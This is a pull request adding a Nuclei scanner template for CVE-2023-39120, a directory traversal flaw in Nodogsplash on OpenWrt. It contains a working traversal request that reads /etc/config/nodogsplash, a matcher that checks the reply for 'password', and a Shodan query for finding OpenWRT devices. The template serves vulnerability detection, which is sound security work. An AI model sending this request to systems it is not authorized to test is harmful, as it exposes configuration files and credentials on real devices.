### PR TITLE
Create CVE-2023-39120.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-39120.yaml
+++ b/http/cves/2023/CVE-2023-39120.yaml
@@ -4,7 +4,7 @@ info:
   name: Nodogsplash - Directory Traversal
   author: Numan Türle
   severity: high
-  description: Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in OpenWrt version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
+  description: Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-39120
     - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed

--- a/http/cves/2023/CVE-2023-39120.yaml
+++ b/http/cves/2023/CVE-2023-39120.yaml
@@ -1,0 +1,32 @@
+id: CVE-2023-39120
+
+info:
+  name: Nodogsplash - Directory Traversal
+  author: Numan Türle
+  severity: high
+  description: Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in OpenWrt version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-39120
+    - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed
+    - https://gist.github.com/numanturle/b52b715c0e88704450debff217c1e519
+    - https://github.com/openwrt/routing/pull/997
+  remediation: Apply all relevant security patches and product upgrades.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-39120
+    cwe-id: CWE-22
+  tags: cve,cve2023,lfi,openwrt,nodogsplash
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "NoDogSplash"
+        condition: or

--- a/http/cves/2023/CVE-2023-39120.yaml
+++ b/http/cves/2023/CVE-2023-39120.yaml
@@ -4,11 +4,12 @@ info:
   name: Nodogsplash - Directory Traversal
   author: Numan Türle
   severity: high
-  description: Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
+  description: |
+    Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-39120
     - https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed
-    - https://gist.github.com/numanturle/b52b715c0e88704450debff217c1e519
+    - https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6
     - https://github.com/openwrt/routing/pull/997
   remediation: Apply all relevant security patches and product upgrades.
   classification:
@@ -16,6 +17,10 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2023-39120
     cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: title:"OpenWRT"
   tags: cve,cve2023,lfi,openwrt,nodogsplash
 
 http:
@@ -23,10 +28,20 @@ http:
     path:
       - "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"
 
-    stop-at-first-match: true
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "NoDogSplash"
-        condition: or
+          - "nodogsplash"
+          - "password"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
- [https://github.com/nodogsplash/nodogsplash/issues/623](https://github.com/nodogsplash/nodogsplash/issues/623)